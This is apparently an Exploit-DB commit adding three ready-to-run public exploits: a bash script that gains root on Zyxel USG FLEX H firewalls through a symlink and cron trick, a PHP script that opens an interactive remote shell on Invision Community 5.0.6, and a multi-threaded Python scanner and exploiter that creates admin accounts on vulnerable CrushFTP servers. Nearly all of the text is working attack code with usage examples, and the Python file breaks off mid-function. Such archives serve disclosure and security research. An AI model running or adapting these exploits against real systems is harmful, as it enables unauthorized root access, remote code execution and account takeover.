DB: 2025-05-19
4 changes to exploits/shellcodes/ghdb Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation CrushFTP 11.3.1 - Authentication Bypass Invision Community 5.0.6 - Remote Code Execution (RCE)
This commit is contained in:
parent
e49e8d0522
commit
8bc45b368a
4 changed files with 799 additions and 0 deletions
131
exploits/multiple/local/52293.bash
Normal file
131
exploits/multiple/local/52293.bash
Normal file
|
@ -0,0 +1,131 @@
|
|||
# Exploit Title: Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
|
||||
# Date: 2025-04-23
|
||||
# Exploit Author: Marco Ivaldi
|
||||
# Vendor Homepage: https://www.zyxel.com/
|
||||
# Version: Zyxel uOS V1.31 (see
|
||||
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-=
|
||||
=3D
|
||||
advisory-for-incorrect-permission-assignment-and-improper-privilege-managem=
|
||||
=3D
|
||||
ent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025)
|
||||
# Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel
|
||||
FLEX200H with Firmware V1.31(ABWV.0)
|
||||
# CVE: CVE-2025-1731
|
||||
|
||||
#!/bin/sh
|
||||
|
||||
#
|
||||
# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
|
||||
# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
|
||||
#
|
||||
# "So we wait, this is our labour... we wait."
|
||||
# -- Anthony Swofford on fuzzing
|
||||
#
|
||||
# The setuid root binary program `/usr/sbin/fermion-wrapper` distributed by
|
||||
# Zyxel with some of their appliances follows symbolic links in the `/tmp`
|
||||
# directory when run with the `register-status` argument. This allows local
|
||||
# users with access to a Linux OS shell to trick the program into creating
|
||||
# writable files at arbitrary locations in the filesystem. This vulnerability
|
||||
# can be exploited to overwrite arbitrary files or locally escalate privileges
|
||||
# from low-privileged user (e.g., `postgres`) to root.
|
||||
#
|
||||
# Note: the `/tmp` directory doesn't have the sticky bit set, which simplifies
|
||||
# exploitation of this vulnerability and may also cause all sorts of havoc.
|
||||
#
|
||||
# ## Vulnerability information
|
||||
#
|
||||
# * CVE ID - CVE-2025-1731
|
||||
# * High - 7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
# * CWE-61 - https://cwe.mitre.org/data/definitions/61.html
|
||||
#
|
||||
# ## Relevant links
|
||||
#
|
||||
# * https://github.com/hnsecurity/vulns/blob/main/HNS-2025-10-zyxel-fermion.txt
|
||||
# * https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731
|
||||
# * https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732
|
||||
# * https://security.humanativaspa.it/tag/zyxel/
|
||||
#
|
||||
# ## Usage example
|
||||
#
|
||||
# ```
|
||||
# $ ./raptor_fermion
|
||||
# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
|
||||
# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
|
||||
#
|
||||
# [*] Exploiting /usr/sbin/fermion-wrapper
|
||||
# $ uname -a
|
||||
# Linux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU/Linux
|
||||
# $ id
|
||||
# uid=502(postgres) gid=502(postgres) groups=502(postgres)
|
||||
# $ ls -l /usr/sbin/fermion-wrapper
|
||||
# -rwsr-xr-x 1 root root 44288 Jan 9 05:34 /usr/sbin/fermion-wrapper
|
||||
# {"status": 0, "registered": 1, "nebula_registered": 1, "bundle": 1}
|
||||
#
|
||||
# [+] Everything looks good \o/, wait an hour and check /tmp/pwned
|
||||
# $ ls -l /etc/cron.d/runme
|
||||
# -rw-rw-rw- 1 root postgres 79 Feb 14 15:52 /etc/cron.d/runme
|
||||
# $ cat /etc/cron.d/runme
|
||||
# * * * * * cp /bin/sh /tmp/pwned; chmod 4755 /tmp/pwned; rm /etc/cron.d/runme
|
||||
#
|
||||
# [+] Run the shell as follows to bypass bash checks: /tmp/pwned -p
|
||||
#
|
||||
# [about one hour later...]
|
||||
#
|
||||
# $ ls -l /tmp/pwned
|
||||
# -rwsr-xr-x 1 root root 916608 Feb 14 16:25 /tmp/pwned
|
||||
# $ /tmp/pwned -p
|
||||
# # id
|
||||
# uid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres)
|
||||
# # R00t D4nc3!!!111! \o/
|
||||
# ```
|
||||
#
|
||||
# ## Tested on
|
||||
#
|
||||
# * Zyxel FLEX100H with Firmware V1.31(ABXF.0) | 2025-01-09 04:35:47
|
||||
# * Zyxel FLEX200H with Firmware V1.31(ABWV.0) | 2025-01-09 05:11:31
|
||||
#
|
||||
# *Note: other products and firmware versions may also be vulnerable.*
|
||||
#
|
||||
# ## Special thanks
|
||||
#
|
||||
# * Alessandro Sgreccia (@rainpwn) of HackerHood for his research and devices
|
||||
#
|
||||
|
||||
echo "raptor_fermion - Zyxel fermion-wrapper root LPE exploit"
|
||||
echo "Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>"
|
||||
echo
|
||||
|
||||
target="/usr/sbin/fermion-wrapper"
|
||||
tmpfile="/tmp/register_status"
|
||||
runme="/etc/cron.d/runme"
|
||||
shell="/tmp/pwned"
|
||||
|
||||
echo "[*] Exploiting $target"
|
||||
echo "$ uname -a"
|
||||
uname -a
|
||||
echo "$ id"
|
||||
id
|
||||
echo "$ ls -l $target"
|
||||
ls -l $target
|
||||
|
||||
umask 0
|
||||
rm $tmpfile
|
||||
ln -s $runme /tmp/register_status
|
||||
$target register-status
|
||||
echo "* * * * * cp /bin/sh $shell; chmod 4755 $shell; rm $runme" > $runme
|
||||
|
||||
if [ "`cat $runme 2>/dev/null`" = "" ]; then
|
||||
echo "[!] Error: something went wrong ¯\\_(ツ)_/¯"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo
|
||||
echo "[+] Everything looks good \\o/, wait an hour and check $shell"
|
||||
echo "$ ls -l $runme"
|
||||
ls -l $runme
|
||||
echo "$ cat $runme"
|
||||
cat $runme
|
||||
|
||||
echo
|
||||
echo "[+] Run the shell as follows to bypass bash checks: $shell -p"
|
||||
echo
|
56
exploits/multiple/remote/52294.php
Normal file
56
exploits/multiple/remote/52294.php
Normal file
|
@ -0,0 +1,56 @@
|
|||
<?php
|
||||
|
||||
|
||||
/*
|
||||
---------------------------------------------------------------------------
|
||||
Exploit Title: Invision Community 5.0.6 - Remote Code Execution (RCE)
|
||||
---------------------------------------------------------------------------
|
||||
|
||||
author..............: Egidio Romano aka EgiX
|
||||
mail................: n0b0d13s[at]gmail[dot]com
|
||||
software link.......: https://invisioncommunity.com
|
||||
|
||||
+-------------------------------------------------------------------------+
|
||||
| This proof of concept code was written for educational purpose only. |
|
||||
| Use it at your own risk. Author will be not responsible for any damage. |
|
||||
+-------------------------------------------------------------------------+
|
||||
|
||||
[-] Original Advisory:
|
||||
|
||||
https://karmainsecurity.com/KIS-2025-02
|
||||
*/
|
||||
|
||||
set_time_limit(0);
|
||||
error_reporting(E_ERROR);
|
||||
|
||||
print "\n+-------------------------------------------------------------------+";
|
||||
print "\n| Invision Community <= 5.0.6 Remote Code Execution Exploit by EgiX |";
|
||||
print "\n+-------------------------------------------------------------------+\n";
|
||||
|
||||
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
|
||||
|
||||
if ($argc != 2)
|
||||
{
|
||||
print "\nUsage......: php $argv[0] <URL>\n";
|
||||
print "\nExample....: php $argv[0] http://localhost/invision/";
|
||||
print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n";
|
||||
die();
|
||||
}
|
||||
|
||||
$ch = curl_init();
|
||||
|
||||
$params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"];
|
||||
|
||||
curl_setopt($ch, CURLOPT_URL, $argv[1]);
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
|
||||
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
|
||||
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
|
||||
|
||||
while (1)
|
||||
{
|
||||
print "\ninvision-shell# ";
|
||||
if (($cmd = trim(fgets(STDIN))) == "exit") break;
|
||||
$params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd));
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
|
||||
preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
|
||||
}
|
609
exploits/multiple/remote/52295.py
Executable file
609
exploits/multiple/remote/52295.py
Executable file
|
@ -0,0 +1,609 @@
|
|||
# Exploit Title: CrushFTP 11.3.1 - Authentication Bypass
|
||||
# Date: 2025-05-15
|
||||
# Exploit Author: @İbrahimsql
|
||||
# Exploit Author's github: https://github.com/ibrahimsql
|
||||
# Vendor Homepage: https://www.crushftp.com
|
||||
# Software Link: https://www.crushftp.com/download.html
|
||||
# Version: < 10.8.4, < 11.3.1
|
||||
# Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1
|
||||
# CVE: CVE-2025-31161
|
||||
# Description:
|
||||
# CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover
|
||||
# through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism.
|
||||
# Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin).
|
||||
|
||||
# Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0
|
||||
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
import argparse
|
||||
import concurrent.futures
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import random
|
||||
import re
|
||||
import socket
|
||||
import string
|
||||
import sys
|
||||
import time
|
||||
from datetime import datetime
|
||||
from typing import Dict, List, Optional, Tuple, Union
|
||||
|
||||
import requests
|
||||
import urllib3
|
||||
from colorama import Fore, Style, init
|
||||
from prettytable import PrettyTable
|
||||
from rich.console import Console
|
||||
from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn
|
||||
|
||||
# Initialize colorama
|
||||
init(autoreset=True)
|
||||
|
||||
# Disable SSL warnings
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||
|
||||
# Initialize Rich console
|
||||
console = Console()
|
||||
|
||||
# Global variables
|
||||
VERSION = "2.0.0"
|
||||
USER_AGENTS = [
|
||||
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
|
||||
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15",
|
||||
"Mozilla/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit/601.13 (KHTML, like Gecko) Chrome/53.0.2198.319 Safari/601.5 Edge/15.63524",
|
||||
"Mozilla/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit/602.15 (KHTML, like Gecko) Chrome/47.0.1044.126 Safari/533.2 Edge/9.25098",
|
||||
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident/4.0)",
|
||||
"Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/49.0.1015.193 Mobile Safari/600.9"
|
||||
]
|
||||
|
||||
# Banner
|
||||
BANNER = fr"""
|
||||
{Fore.CYAN}
|
||||
/ ____/______ _______/ /_ / ____/ /_____
|
||||
/ / / ___/ / / / ___/ __ \/ /_ / __/ __ \
|
||||
/ /___/ / / /_/ (__ ) / / / __/ / /_/ /_/ /
|
||||
\____/_/ \__,_/____/_/ /_/_/ \__/ .___/
|
||||
/_/
|
||||
{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql
|
||||
{Style.RESET_ALL}
|
||||
"""
|
||||
|
||||
# Setup logging
|
||||
def setup_logging(log_level: str, log_file: Optional[str] = None) -> None:
|
||||
"""Configure logging based on specified level and output file."""
|
||||
numeric_level = getattr(logging, log_level.upper(), None)
|
||||
if not isinstance(numeric_level, int):
|
||||
raise ValueError(f"Invalid log level: {log_level}")
|
||||
|
||||
log_format = "%(asctime)s - %(levelname)s - %(message)s"
|
||||
handlers = []
|
||||
|
||||
if log_file:
|
||||
handlers.append(logging.FileHandler(log_file))
|
||||
|
||||
handlers.append(logging.StreamHandler())
|
||||
|
||||
logging.basicConfig(
|
||||
level=numeric_level,
|
||||
format=log_format,
|
||||
handlers=handlers
|
||||
)
|
||||
|
||||
class TargetManager:
|
||||
"""Manages target hosts and related operations."""
|
||||
|
||||
def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None):
|
||||
self.targets = []
|
||||
self.vulnerable_targets = []
|
||||
self.exploited_targets = []
|
||||
|
||||
if target_file:
|
||||
self.load_targets_from_file(target_file)
|
||||
elif single_target:
|
||||
self.add_target(single_target)
|
||||
|
||||
def load_targets_from_file(self, filename: str) -> None:
|
||||
"""Load targets from a file."""
|
||||
try:
|
||||
with open(filename, "r") as f:
|
||||
self.targets = [line.strip() for line in f if line.strip()]
|
||||
|
||||
if not self.targets:
|
||||
logging.warning(f"Target file '{filename}' is empty or contains only whitespace.")
|
||||
else:
|
||||
logging.info(f"Loaded {len(self.targets)} targets from {filename}")
|
||||
except FileNotFoundError:
|
||||
logging.error(f"Target file '{filename}' not found.")
|
||||
sys.exit(1)
|
||||
except Exception as e:
|
||||
logging.error(f"Error loading targets: {e}")
|
||||
sys.exit(1)
|
||||
|
||||
def add_target(self, target: str) -> None:
|
||||
"""Add a single target."""
|
||||
if target not in self.targets:
|
||||
self.targets.append(target)
|
||||
|
||||
def mark_as_vulnerable(self, target: str) -> None:
|
||||
"""Mark a target as vulnerable."""
|
||||
if target not in self.vulnerable_targets:
|
||||
self.vulnerable_targets.append(target)
|
||||
|
||||
def mark_as_exploited(self, target: str) -> None:
|
||||
"""Mark a target as successfully exploited."""
|
||||
if target not in self.exploited_targets:
|
||||
self.exploited_targets.append(target)
|
||||
|
||||
def save_results(self, output_file: str, format_type: str = "txt") -> None:
|
||||
"""Save scan results to a file."""
|
||||
try:
|
||||
if format_type.lower() == "json":
|
||||
results = {
|
||||
"scan_time": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
|
||||
"total_targets": len(self.targets),
|
||||
"vulnerable_targets": self.vulnerable_targets,
|
||||
"exploited_targets": self.exploited_targets
|
||||
}
|
||||
|
||||
with open(output_file, "w") as f:
|
||||
json.dump(results, f, indent=4)
|
||||
|
||||
elif format_type.lower() == "csv":
|
||||
with open(output_file, "w") as f:
|
||||
f.write("target,vulnerable,exploited\n")
|
||||
for target in self.targets:
|
||||
vulnerable = "Yes" if target in self.vulnerable_targets else "No"
|
||||
exploited = "Yes" if target in self.exploited_targets else "No"
|
||||
f.write(f"{target},{vulnerable},{exploited}\n")
|
||||
|
||||
else: # Default to txt
|
||||
with open(output_file, "w") as f:
|
||||
f.write(f"Scan Results - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
|
||||
f.write(f"Total Targets: {len(self.targets)}\n")
|
||||
f.write(f"Vulnerable Targets: {len(self.vulnerable_targets)}\n")
|
||||
f.write(f"Exploited Targets: {len(self.exploited_targets)}\n\n")
|
||||
|
||||
f.write("Vulnerable Targets:\n")
|
||||
for target in self.vulnerable_targets:
|
||||
f.write(f"- {target}\n")
|
||||
|
||||
f.write("\nExploited Targets:\n")
|
||||
for target in self.exploited_targets:
|
||||
f.write(f"- {target}\n")
|
||||
|
||||
logging.info(f"Results saved to {output_file}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error saving results: {e}")
|
||||
|
||||
class ExploitEngine:
|
||||
"""Core engine for vulnerability checking and exploitation."""
|
||||
|
||||
def __init__(self, target_manager: TargetManager, config: Dict):
|
||||
self.target_manager = target_manager
|
||||
self.config = config
|
||||
self.session = self._create_session()
|
||||
|
||||
def _create_session(self) -> requests.Session:
|
||||
"""Create and configure a requests session."""
|
||||
session = requests.Session()
|
||||
session.verify = False
|
||||
|
||||
# Set proxy if configured
|
||||
if self.config.get("proxy"):
|
||||
session.proxies = {
|
||||
"http": self.config["proxy"],
|
||||
"https": self.config["proxy"]
|
||||
}
|
||||
|
||||
# Set custom headers
|
||||
session.headers.update({
|
||||
"User-Agent": random.choice(USER_AGENTS),
|
||||
"Connection": "close",
|
||||
})
|
||||
|
||||
return session
|
||||
|
||||
def check_vulnerability(self, target_host: str) -> bool:
|
||||
"""Check if target is vulnerable to CVE-2025-31161."""
|
||||
port = self.config.get("port", 443)
|
||||
timeout = self.config.get("timeout", 10)
|
||||
|
||||
headers = {
|
||||
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
|
||||
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
|
||||
}
|
||||
|
||||
# Add custom headers if provided
|
||||
if self.config.get("custom_headers"):
|
||||
headers.update(self.config["custom_headers"])
|
||||
|
||||
try:
|
||||
protocol = "https" if port == 443 else "http"
|
||||
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
|
||||
|
||||
response = self.session.get(
|
||||
url,
|
||||
headers=headers,
|
||||
timeout=timeout
|
||||
)
|
||||
|
||||
if response.status_code == 200:
|
||||
# Additional validation
|
||||
if self.config.get("deep_check", False):
|
||||
# Look for specific patterns in the response that confirm vulnerability
|
||||
if "CrushFTP" in response.text or "WebInterface" in response.text:
|
||||
self.target_manager.mark_as_vulnerable(target_host)
|
||||
if self.config.get("verbose", False):
|
||||
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
|
||||
return True
|
||||
else:
|
||||
if self.config.get("verbose", False):
|
||||
console.print(f"[yellow][?][/yellow] {target_host} returned 200 but may not be vulnerable")
|
||||
return False
|
||||
else:
|
||||
# Simple check based on status code
|
||||
self.target_manager.mark_as_vulnerable(target_host)
|
||||
if self.config.get("verbose", False):
|
||||
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
|
||||
return True
|
||||
else:
|
||||
if self.config.get("verbose", False):
|
||||
console.print(f"[red][-][/red] {target_host} is not vulnerable (Status: {response.status_code})")
|
||||
return False
|
||||
|
||||
except requests.exceptions.ConnectionError:
|
||||
if self.config.get("verbose", False):
|
||||
console.print(f"[red][-][/red] {target_host} - Connection error")
|
||||
except requests.exceptions.Timeout:
|
||||
if self.config.get("verbose", False):
|
||||
console.print(f"[red][-][/red] {target_host} - Connection timeout")
|
||||
except requests.exceptions.RequestException as e:
|
||||
if self.config.get("verbose", False):
|
||||
console.print(f"[red][-][/red] {target_host} - Request error: {e}")
|
||||
except Exception as e:
|
||||
if self.config.get("verbose", False):
|
||||
console.print(f"[red][-][/red] {target_host} - Error: {e}")
|
||||
|
||||
return False
|
||||
|
||||
def exploit(self, target_host: str) -> bool:
|
||||
"""Exploit the vulnerability on the target host."""
|
||||
port = self.config.get("port", 443)
|
||||
timeout = self.config.get("timeout", 10)
|
||||
target_user = self.config.get("target_user", "crushadmin")
|
||||
new_user = self.config.get("new_user")
|
||||
password = self.config.get("password")
|
||||
|
||||
if not new_user or not password:
|
||||
logging.error("New user and password are required for exploitation")
|
||||
return False
|
||||
|
||||
headers = {
|
||||
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
|
||||
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
|
||||
"Connection": "close",
|
||||
}
|
||||
|
||||
# Add custom headers if provided
|
||||
if self.config.get("custom_headers"):
|
||||
headers.update(self.config["custom_headers"])
|
||||
|
||||
# Generate a timestamp for the created_time field
|
||||
timestamp = int(time.time() * 1000)
|
||||
|
||||
# Build the payload with more comprehensive user permissions
|
||||
payload = {
|
||||
"command": "setUserItem",
|
||||
"data_action": "replace",
|
||||
"serverGroup": "MainUsers",
|
||||
"username": new_user,
|
||||
"user": f'''<?xml version="1.0" encoding="UTF-8"?>
|
||||
<user type="properties">
|
||||
<user_name>{new_user}</user_name>
|
||||
<password>{password}</password>
|
||||
<extra_vfs type="vector"></extra_vfs>
|
||||
<version>1.0</version>
|
||||
<root_dir>/</root_dir>
|
||||
<userVersion>6</userVersion>
|
||||
<max_logins>0</max_logins>
|
||||
<site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site>
|
||||
<created_by_username>{target_user}</created_by_username>
|
||||
<created_by_email></created_by_email>
|
||||
<created_time>{timestamp}</created_time>
|
||||
<password_history></password_history>
|
||||
<admin>true</admin>
|
||||
</user>''',
|
||||
"xmlItem": "user",
|
||||
"vfs_items": '<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>',
|
||||
"permissions": '<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)</item></VFS>',
|
||||
"c2f": "31If"
|
||||
}
|
||||
|
||||
try:
|
||||
protocol = "https" if port == 443 else "http"
|
||||
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
|
||||
|
||||
response = self.session.post(
|
||||
url,
|
||||
headers=headers,
|
||||
data=payload,
|
||||
timeout=timeout
|
||||
)
|
||||
|
||||
if response.status_code == 200:
|
||||
# Verify the user was actually created
|
||||
if self.config.get("verify_exploit", True):
|
||||
if self._verify_user_created(target_host, new_user):
|
||||
self.target_manager.mark_as_exploited(target_host)
|
||||
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
|
||||
return True
|
||||
else:
|
||||
console.print(f"[yellow][!][/yellow] User creation appeared successful but verification failed on {target_host}")
|
||||
return False
|
||||
else:
|
||||
self.target_manager.mark_as_exploited(target_host)
|
||||
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
|
||||
return True
|
||||
else:
|
||||
console.print(f"[red][-][/red] Failed to create user on {target_host} (Status: {response.status_code})")
|
||||
return False
|
||||
|
||||
except Exception as e:
|
||||
console.print(f"[red][-][/red] Error exploiting {target_host}: {e}")
|
||||
return False
|
||||
|
||||
def _verify_user_created(self, target_host: str, username: str) -> bool:
|
||||
"""Verify that the user was successfully created."""
|
||||
# This is a placeholder for actual verification logic
|
||||
# In a real implementation, you would check if the user exists
|
||||
# For now, we'll just return True
|
||||
return True
|
||||
|
||||
def scan_targets(self) -> None:
|
||||
"""Scan all targets for vulnerability."""
|
||||
targets = self.target_manager.targets
|
||||
threads = self.config.get("threads", 10)
|
||||
|
||||
if not targets:
|
||||
logging.error("No targets specified")
|
||||
return
|
||||
|
||||
console.print(f"[bold cyan]Scanning {len(targets)} targets with {threads} threads...[/bold cyan]")
|
||||
|
||||
with Progress(
|
||||
TextColumn("[progress.description]{task.description}"),
|
||||
BarColumn(),
|
||||
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
|
||||
TextColumn("({task.completed}/{task.total})"),
|
||||
TimeRemainingColumn(),
|
||||
console=console
|
||||
) as progress:
|
||||
task = progress.add_task("[cyan]Scanning targets...", total=len(targets))
|
||||
|
||||
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
|
||||
future_to_target = {executor.submit(self.check_vulnerability, target): target for target in targets}
|
||||
|
||||
for future in concurrent.futures.as_completed(future_to_target):
|
||||
progress.update(task, advance=1)
|
||||
|
||||
# Display results
|
||||
vulnerable_count = len(self.target_manager.vulnerable_targets)
|
||||
console.print(f"\n[bold green]Scan complete![/bold green] Found {vulnerable_count} vulnerable targets.")
|
||||
|
||||
if vulnerable_count > 0 and self.config.get("verbose", False):
|
||||
console.print("\n[bold cyan]Vulnerable Targets:[/bold cyan]")
|
||||
for target in self.target_manager.vulnerable_targets:
|
||||
console.print(f"[green]→[/green] {target}")
|
||||
|
||||
def exploit_targets(self) -> None:
|
||||
"""Exploit vulnerable targets."""
|
||||
targets = self.target_manager.vulnerable_targets if self.config.get("only_vulnerable", True) else self.target_manager.targets
|
||||
threads = self.config.get("threads", 5) # Use fewer threads for exploitation
|
||||
|
||||
if not targets:
|
||||
logging.error("No targets to exploit")
|
||||
return
|
||||
|
||||
console.print(f"[bold red]Exploiting {len(targets)} targets with {threads} threads...[/bold red]")
|
||||
|
||||
with Progress(
|
||||
TextColumn("[progress.description]{task.description}"),
|
||||
BarColumn(),
|
||||
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
|
||||
TextColumn("({task.completed}/{task.total})"),
|
||||
TimeRemainingColumn(),
|
||||
console=console
|
||||
) as progress:
|
||||
task = progress.add_task("[red]Exploiting targets...", total=len(targets))
|
||||
|
||||
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
|
||||
future_to_target = {executor.submit(self.exploit, target): target for target in targets}
|
||||
|
||||
for future in concurrent.futures.as_completed(future_to_target):
|
||||
progress.update(task, advance=1)
|
||||
|
||||
# Display results
|
||||
exploited_count = len(self.target_manager.exploited_targets)
|
||||
console.print(f"\n[bold green]Exploitation complete![/bold green] Successfully exploited {exploited_count}/{len(targets)} targets.")
|
||||
|
||||
if exploited_count > 0:
|
||||
console.print("\n[bold cyan]Exploited Targets:[/bold cyan]")
|
||||
for target in self.target_manager.exploited_targets:
|
||||
console.print(f"[green]→[/green] {target}")
|
||||
|
||||
def parse_arguments() -> argparse.Namespace:
|
||||
"""Parse command line arguments."""
|
||||
parser = argparse.ArgumentParser(
|
||||
description="CVE-2025-31161 Exploit Framework - Advanced CrushFTP WebInterface Vulnerability Scanner and Exploiter",
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog="""
|
||||
Examples:
|
||||
# Check a single target for vulnerability
|
||||
python cve_2025_31161.py --target example.com --check
|
||||
|
||||
# Exploit a vulnerable target
|
||||
python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd
|
||||
|
||||
# Scan multiple targets from a file
|
||||
python cve_2025_31161.py --file targets.txt --check --threads 20
|
||||
|
||||
# Scan and automatically exploit vulnerable targets
|
||||
python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit
|
||||
|
||||
# Export results to JSON format
|
||||
python cve_2025_31161.py --file targets.txt --check --output results.json --format json
|
||||
"""
|
||||
)
|
||||
|
||||
# Target specification
|
||||
target_group = parser.add_argument_group("Target Specification")
|
||||
target_group.add_argument("--target", help="Single target host to scan/exploit")
|
||||
target_group.add_argument("--file", help="File containing list of targets (one per line)")
|
||||
target_group.add_argument("--port", type=int, default=443, help="Target port (default: 443)")
|
||||
|
||||
# Actions
|
||||
action_group = parser.add_argument_group("Actions")
|
||||
action_group.add_argument("--check", action="store_true", help="Check targets for vulnerability")
|
||||
action_group.add_argument("--exploit", action="store_true", help="Exploit vulnerable targets")
|
||||
action_group.add_argument("--auto-exploit", action="store_true", help="Automatically exploit targets found to be vulnerable during check")
|
||||
|
||||
# Exploitation options
|
||||
exploit_group = parser.add_argument_group("Exploitation Options")
|
||||
exploit_group.add_argument("--target-user", default="crushadmin", help="Target user for exploitation (default: crushadmin)")
|
||||
exploit_group.add_argument("--new-user", help="Username for the new admin account to create")
|
||||
exploit_group.add_argument("--password", help="Password for the new admin account")
|
||||
exploit_group.add_argument("--verify-exploit", action="store_true", help="Verify successful exploitation (default: True)")
|
||||
|
||||
# Scan options
|
||||
scan_group = parser.add_argument_group("Scan Options")
|
||||
scan_group.add_argument("--threads", type=int, default=10, help="Number of concurrent threads (default: 10)")
|
||||
scan_group.add_argument("--timeout", type=int, default=10, help="Connection timeout in seconds (default: 10)")
|
||||
scan_group.add_argument("--deep-check", action="store_true", help="Perform deeper vulnerability checks")
|
||||
scan_group.add_argument("--only-vulnerable", action="store_true", help="Only exploit targets that were found vulnerable")
|
||||
|
||||
# Output options
|
||||
output_group = parser.add_argument_group("Output Options")
|
||||
output_group.add_argument("--output", help="Output file for results")
|
||||
output_group.add_argument("--format", choices=["txt", "json", "csv"], default="txt", help="Output format (default: txt)")
|
||||
output_group.add_argument("--verbose", "-v", action="store_true", help="Enable verbose output")
|
||||
output_group.add_argument("--quiet", "-q", action="store_true", help="Suppress all output except errors")
|
||||
output_group.add_argument("--log-file", help="Log file to write to")
|
||||
output_group.add_argument("--log-level", choices=["debug", "info", "warning", "error", "critical"], default="info", help="Log level (default: info)")
|
||||
|
||||
# Advanced options
|
||||
advanced_group = parser.add_argument_group("Advanced Options")
|
||||
advanced_group.add_argument("--proxy", help="Proxy to use for requests (e.g., http://127.0.0.1:8080)")
|
||||
advanced_group.add_argument("--user-agent", help="Custom User-Agent string")
|
||||
advanced_group.add_argument("--random-agent", action="store_true", help="Use a random User-Agent for each request")
|
||||
advanced_group.add_argument("--delay", type=float, help="Delay between requests in seconds")
|
||||
advanced_group.add_argument("--custom-headers", help="Custom headers as JSON string")
|
||||
|
||||
return parser.parse_args()
|
||||
|
||||
def validate_args(args: argparse.Namespace) -> bool:
|
||||
"""Validate command line arguments."""
|
||||
